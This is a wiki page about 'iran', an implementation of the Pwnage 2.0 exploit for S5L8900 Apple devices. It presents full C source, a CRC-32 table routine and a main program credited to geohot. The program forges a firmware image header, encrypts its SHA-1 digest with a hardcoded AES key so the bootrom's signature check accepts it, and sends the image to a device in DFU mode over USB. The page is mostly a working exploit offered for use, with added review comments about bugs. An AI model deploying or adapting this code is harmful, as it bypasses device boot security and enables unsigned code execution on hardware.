
iran

From The Apple Wiki

iran is an implementation of the Pwnage 2.0 exploit. It injects a pwned DFU Mode, allowing custom firmware to be restored to the device.

External Links

pwnd dfu code for S5L8900

//======================================================== file = crc32.c =====
//=  Program to compute CRC-32 using the "table method" for 8-bit subtracts   =
//=============================================================================
//=  Notes: Uses the standard "Charles Michael Heard" code available from     =
//=         http://cell-relay.indiana.edu/cell-relay/publications/software    =
//=         /CRC which was adapted from the algorithm described by Aram       =
//=         Perez, "Byte-wise CRC Calculations," IEEE Micro 3, 40 (1983).     =
//=---------------------------------------------------------------------------=
//=  Build:  bcc32 crc32.c, gcc crc32.c                                       =
//=---------------------------------------------------------------------------=
//=  History:  KJC (8/24/00) - Genesis (from Heard code, see above)           =
//=============================================================================
//----- Type defines ----------------------------------------------------------
typedef unsigned char      byte;    // Byte is a char
typedef unsigned short int word16;  // 16-bit word is a short int
typedef unsigned int       word32;  // 32-bit word is an int (assumes int is 32 bits wide; C only guarantees >= 16)
//----- Defines ---------------------------------------------------------------
#define POLYNOMIAL 0x04c11db7L      // Standard CRC-32 polynomial (normal, MSB-first form).
                                    // Kept for reference only: the table below is precomputed,
                                    // so nothing in the code shown here expands this macro.
//----- Global variables ------------------------------------------------------
// Lookup table for the byte-wise (LSB-first / reflected) CRC-32 used by
// update_crc() below.  Entry 0x80 is 0xEDB88320, the bit-reversed form of
// POLYNOMIAL, so this is the standard reflected CRC-32 table (the one used by
// zlib, PNG and Ethernet).  Declared unsigned long, which may be 64 bits wide
// on some platforms; every entry fits in 32 bits and update_crc() narrows the
// result back to word32, so the wider storage is harmless.
unsigned long  crctable[256] =
{
0x00000000L, 0x77073096L, 0xEE0E612CL, 0x990951BAL,
0x076DC419L, 0x706AF48FL, 0xE963A535L, 0x9E6495A3L,
0x0EDB8832L, 0x79DCB8A4L, 0xE0D5E91EL, 0x97D2D988L,
0x09B64C2BL, 0x7EB17CBDL, 0xE7B82D07L, 0x90BF1D91L,
0x1DB71064L, 0x6AB020F2L, 0xF3B97148L, 0x84BE41DEL,
0x1ADAD47DL, 0x6DDDE4EBL, 0xF4D4B551L, 0x83D385C7L,
0x136C9856L, 0x646BA8C0L, 0xFD62F97AL, 0x8A65C9ECL,
0x14015C4FL, 0x63066CD9L, 0xFA0F3D63L, 0x8D080DF5L,
0x3B6E20C8L, 0x4C69105EL, 0xD56041E4L, 0xA2677172L,
0x3C03E4D1L, 0x4B04D447L, 0xD20D85FDL, 0xA50AB56BL,
0x35B5A8FAL, 0x42B2986CL, 0xDBBBC9D6L, 0xACBCF940L,
0x32D86CE3L, 0x45DF5C75L, 0xDCD60DCFL, 0xABD13D59L,
0x26D930ACL, 0x51DE003AL, 0xC8D75180L, 0xBFD06116L,
0x21B4F4B5L, 0x56B3C423L, 0xCFBA9599L, 0xB8BDA50FL,
0x2802B89EL, 0x5F058808L, 0xC60CD9B2L, 0xB10BE924L,
0x2F6F7C87L, 0x58684C11L, 0xC1611DABL, 0xB6662D3DL,
0x76DC4190L, 0x01DB7106L, 0x98D220BCL, 0xEFD5102AL,
0x71B18589L, 0x06B6B51FL, 0x9FBFE4A5L, 0xE8B8D433L,
0x7807C9A2L, 0x0F00F934L, 0x9609A88EL, 0xE10E9818L,
0x7F6A0DBBL, 0x086D3D2DL, 0x91646C97L, 0xE6635C01L,
0x6B6B51F4L, 0x1C6C6162L, 0x856530D8L, 0xF262004EL,
0x6C0695EDL, 0x1B01A57BL, 0x8208F4C1L, 0xF50FC457L,
0x65B0D9C6L, 0x12B7E950L, 0x8BBEB8EAL, 0xFCB9887CL,
0x62DD1DDFL, 0x15DA2D49L, 0x8CD37CF3L, 0xFBD44C65L,
0x4DB26158L, 0x3AB551CEL, 0xA3BC0074L, 0xD4BB30E2L,
0x4ADFA541L, 0x3DD895D7L, 0xA4D1C46DL, 0xD3D6F4FBL,
0x4369E96AL, 0x346ED9FCL, 0xAD678846L, 0xDA60B8D0L,
0x44042D73L, 0x33031DE5L, 0xAA0A4C5FL, 0xDD0D7CC9L,
0x5005713CL, 0x270241AAL, 0xBE0B1010L, 0xC90C2086L,
0x5768B525L, 0x206F85B3L, 0xB966D409L, 0xCE61E49FL,
0x5EDEF90EL, 0x29D9C998L, 0xB0D09822L, 0xC7D7A8B4L,
0x59B33D17L, 0x2EB40D81L, 0xB7BD5C3BL, 0xC0BA6CADL,
0xEDB88320L, 0x9ABFB3B6L, 0x03B6E20CL, 0x74B1D29AL,
0xEAD54739L, 0x9DD277AFL, 0x04DB2615L, 0x73DC1683L,
0xE3630B12L, 0x94643B84L, 0x0D6D6A3EL, 0x7A6A5AA8L,
0xE40ECF0BL, 0x9309FF9DL, 0x0A00AE27L, 0x7D079EB1L,
0xF00F9344L, 0x8708A3D2L, 0x1E01F268L, 0x6906C2FEL,
0xF762575DL, 0x806567CBL, 0x196C3671L, 0x6E6B06E7L,
0xFED41B76L, 0x89D32BE0L, 0x10DA7A5AL, 0x67DD4ACCL,
0xF9B9DF6FL, 0x8EBEEFF9L, 0x17B7BE43L, 0x60B08ED5L,
0xD6D6A3E8L, 0xA1D1937EL, 0x38D8C2C4L, 0x4FDFF252L,
0xD1BB67F1L, 0xA6BC5767L, 0x3FB506DDL, 0x48B2364BL,
0xD80D2BDAL, 0xAF0A1B4CL, 0x36034AF6L, 0x41047A60L,
0xDF60EFC3L, 0xA867DF55L, 0x316E8EEFL, 0x4669BE79L,
0xCB61B38CL, 0xBC66831AL, 0x256FD2A0L, 0x5268E236L,
0xCC0C7795L, 0xBB0B4703L, 0x220216B9L, 0x5505262FL,
0xC5BA3BBEL, 0xB2BD0B28L, 0x2BB45A92L, 0x5CB36A04L,
0xC2D7FFA7L, 0xB5D0CF31L, 0x2CD99E8BL, 0x5BDEAE1DL,
0x9B64C2B0L, 0xEC63F226L, 0x756AA39CL, 0x026D930AL,
0x9C0906A9L, 0xEB0E363FL, 0x72076785L, 0x05005713L,
0x95BF4A82L, 0xE2B87A14L, 0x7BB12BAEL, 0x0CB61B38L,
0x92D28E9BL, 0xE5D5BE0DL, 0x7CDCEFB7L, 0x0BDBDF21L,
0x86D3D2D4L, 0xF1D4E242L, 0x68DDB3F8L, 0x1FDA836EL,
0x81BE16CDL, 0xF6B9265BL, 0x6FB077E1L, 0x18B74777L,
0x88085AE6L, 0xFF0F6A70L, 0x66063BCAL, 0x11010B5CL,
0x8F659EFFL, 0xF862AE69L, 0x616BFFD3L, 0x166CCF45L,
0xA00AE278L, 0xD70DD2EEL, 0x4E048354L, 0x3903B3C2L,
0xA7672661L, 0xD06016F7L, 0x4969474DL, 0x3E6E77DBL,
0xAED16A4AL, 0xD9D65ADCL, 0x40DF0B66L, 0x37D83BF0L,
0xA9BCAE53L, 0xDEBB9EC5L, 0x47B2CF7FL, 0x30B5FFE9L,
0xBDBDF21CL, 0xCABAC28AL, 0x53B39330L, 0x24B4A3A6L,
0xBAD03605L, 0xCDD70693L, 0x54DE5729L, 0x23D967BFL,
0xB3667A2EL, 0xC4614AB8L, 0x5D681B02L, 0x2A6F2B94L,
0xB40BBE37L, 0xC30C8EA1L, 0x5A05DF1BL, 0x2D02EF8DL
};
//----- Prototypes ------------------------------------------------------------
word32 update_crc(word32 crc_accum, byte *data_blk_ptr, word32 data_blk_size);
//=============================================================================
//=  CRC32 generation                                                         =
//=============================================================================
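// Run data_blk_size bytes from data_blk_ptr through the table-driven CRC-32,
// one byte per step: the table index is the low byte of (crc XOR data byte),
// and the accumulator is shifted right by 8 (LSB-first / reflected form).
//   crc            running accumulator; pass 0xFFFFFFFF to start a fresh CRC,
//                  or the value returned by a previous call to continue one
//   data_blk_ptr   bytes to process (read only; must hold data_blk_size bytes)
//   data_blk_size  number of bytes to process; 0 returns crc unchanged
// Returns the updated accumulator.  No final XOR is applied; callers that want
// the conventional CRC-32 result must invert the return value themselves.
// crctable[] is unsigned long, so the XOR result is narrowed back to word32 on
// assignment; every table entry fits in 32 bits, so nothing is lost.
word32 update_crc(word32 crc, byte *data_blk_ptr, word32 data_blk_size)
{
  for (word32 j = 0; j < data_blk_size; j++) {
    crc = crctable[(crc ^ data_blk_ptr[j]) & 0xFFL] ^ (crc >> 8);
  }
  return crc;
}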

source code

#include "usb.h"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include "crc.h"
#include "openssl/aes.h"
#include "openssl/sha.h"
// 16-byte AES-128 key handed to AES_set_encrypt_key() in main() to encrypt the
// SHA-1 digest of the 0x40-byte image header.  Value as published on this page.
const unsigned char key837[]={0x18,0x84,0x58,0xA6,0xD1,0x50,0x34,0xDF,0xE3,0x86,0xF2,0x3B,0x61,0xD4,0x37,0x74};
// Print c bytes starting at a as two-digit uppercase hex, 16 bytes per line,
// then a final newline.  A count of 0 (or negative) prints only the newline.
void hexdump(unsigned char *a, int c)
{
	int i = 0;
	while (i < c) {
		if (i != 0 && i % 16 == 0) {
			printf("\n");
		}
		printf("%2.2X ", a[i]);
		i++;
	}
	printf("\n");
}
// Entry point.  Reads the payload named in argv[1] plus a file literally named
// "cert" from the working directory, assembles them into one image with a
// 0x800-byte header region and a 0x10-byte trailer (0xC fixed bytes + 4-byte
// CRC), then streams the image to the first matching USB device in 0x800-byte
// chunks.  Returns 0 on success and -1 on a usage, file or device error.
// NOTE(review): memset/strcpy/memcpy are used but <string.h> is not in the
// include list above, so they are implicitly declared (invalid since C99).
int main(int argc, char *argv[])
{
	printf("dfu unsigned execute by geohot\n");
	printf("based off the dev teams pwnage 2.0 exploit\n");
	int a;
   char buf[255];                 // receives the 6-byte status replies polled below; only buf[0..5] is ever written
   unsigned char *fbuf;           // the assembled image; never freed (the process exits right after use)
//building file
	if(argc<2) { printf("usage: %s <filename>\n",argv[0]); return -1; }
	FILE *cert=fopen("cert","rb");
	FILE *f=fopen(argv[1], "rb");
	if(cert==0||f==0) { printf("file not found\n"); return -1; }   // NOTE(review): whichever file did open is leaked on this path
	fseek(cert, 0, SEEK_END);
	int len_cert = ftell(cert);    // NOTE(review): ftell() returns long and -1 on error; unchecked and narrowed to int
	fseek(cert, 0, SEEK_SET);
	fseek(f, 0, SEEK_END);
	int len = ftell(f);            // NOTE(review): same -- a failure here feeds a negative size into malloc()/fread()
	fseek(f, 0, SEEK_SET);
	fbuf=malloc(0x800+len+len_cert+0x10);   // header + payload + cert + 0xC trailer + 4 CRC bytes; NOTE(review): NULL is not checked
	memset(fbuf,0,0x800);          // only the header region is zeroed; the rest is expected to be filled by the two fread()s
	fread(&fbuf[0x800],1,len,f);   // NOTE(review): return values unchecked -- a short read leaves uninitialized bytes that are then hashed, CRC'd and sent
	fread(&fbuf[0x800+len],1,len_cert,cert);
	fclose(f); fclose(cert);
	printf("files read %X %X\n",len,len_cert);   // NOTE(review): %X with int arguments; harmless in practice but mismatched
	strcpy(fbuf, "89001.0");       // writes 8 bytes incl. the NUL at fbuf[7], which the next line overwrites; NOTE(review): unsigned char* passed where char* is expected
	fbuf[7]=0x04;
	fbuf[0x3E]=0x04;
	memcpy(&fbuf[0xC],&len,0x4);			//data size    (these four fields are written in host byte order -- assumes a little-endian host)
	memcpy(&fbuf[0x10],&len,0x4);		//sig offset
	a=len+0x80;
	memcpy(&fbuf[0x14],&a,0x4);			//cert offset
	a=0xC5E;
	memcpy(&fbuf[0x18],&a,0x4);			//cert length
	printf("header generated\n");
//hashing header
	unsigned char shaout[0x14];    // SHA-1 digest is 20 bytes
	SHA1(fbuf,0x40,shaout);        // digest of the first 0x40 header bytes
	AES_KEY mkey;
	AES_set_encrypt_key(key837, 0x80, &mkey);   // 128-bit key; return value unchecked
	unsigned char iv[0x10]; memset(iv,0,0x10);  // all-zero IV; for a single 16-byte block, CBC with a zero IV is just AES-ECB of that block
	AES_cbc_encrypt(shaout, shaout, 0x10, &mkey, iv, AES_ENCRYPT);   // in place; only the first 16 of the 20 digest bytes are encrypted
	memcpy(&fbuf[0x40],shaout,0x10);            // ...and only those 16 bytes are stored in the header
//appending dfu footer
	unsigned int crc=0xFFFFFFFF;   // conventional CRC-32 initial value; note no final XOR is applied below
	const char header[]={0xff,0xff,0xff,0xff,0xac,0x05,0x00,0x01,0x55,0x46,0x44,0x10};   // NOTE(review): 0xff/0xac do not fit a signed char -- should be unsigned char
	memcpy(&fbuf[0x800+len+len_cert],header,0xC);
	crc=update_crc(crc, fbuf, 0x800+len+len_cert+0xC);   // CRC over everything written so far, trailer bytes included
	for(a=0;a<4;a++) { fbuf[0x800+len+len_cert+0xC+a]=crc&0xFF; crc=crc>>8; }   // CRC stored little-endian in the last 4 bytes of the image
//sending file
   usb_init();
  	usb_find_busses();
	usb_find_devices();
   printf("USB ready\n");
   struct usb_bus *bus;
   struct usb_device *dev;
   struct usb_dev_handle *idev=0;
   int dtype=0;                   // NOTE(review): assigned below but never read
   for(bus=usb_get_busses();bus;bus=bus->next)
	{
       printf("BUS found\n");
		for(dev=bus->devices;dev;dev=dev->next)
		{
           printf(" %4.4X %4.4X\n", dev->descriptor.idVendor, dev->descriptor.idProduct);
           if(dev->descriptor.idVendor==0x5ac && dev->descriptor.idProduct==0x1222)      //DFU Mode
		{
               printf("Found DFU\n");
                idev=usb_open(dev);   // NOTE(review): with more than one match, earlier handles are overwritten without usb_close()
                dtype=2;
            }
		}
	}
	if(idev==0) { printf("No device found\n"); return -1;}
	int c=0;                       // block counter, passed as wValue of each transfer
	a=0;                           // byte offset into fbuf
	printf("sending 0x%x bytes\n", (0x800+len+len_cert+0x10));
	while(a<((0x800+len+len_cert+0x10)+0x800))   // runs one extra 0x800 step so the last iteration sends a zero-length chunk (sl==0)
	{
		int sl=((0x800+len+len_cert+0x10)-a);
		if(sl<0) sl=0;
		if(sl>0x800) sl=0x800;
		//printf("%X %X\n",a,sl);
		if(usb_control_msg(idev, 0x21, 1, c, 0, &fbuf[a], sl, 1000)==sl) printf(".");   // host-to-device class request 1 (presumably DFU_DNLOAD -- confirm); '.' = whole chunk accepted
		else printf("x");                                                               // NOTE(review): a short or failed transfer is only logged, never retried or aborted
		if(sl==0) printf("\n");
		int b=0;
		while(usb_control_msg(idev, 0xA1, 3, 0, 0, buf, 6, 1000)==6&&b<5)   // poll a 6-byte status reply up to 5 times (presumably DFU_GETSTATUS -- confirm)
		{
			b++;
			if(sl==0) hexdump(buf, 6);   // NOTE(review): char* passed to an unsigned char* parameter
			if(buf[4]==5) break;         // byte 4 looks like the state field and 5 the state waited for -- confirm against the DFU spec
		}
		a+=0x800;
		c++;
   }
	usb_close(idev);
	return 0;
}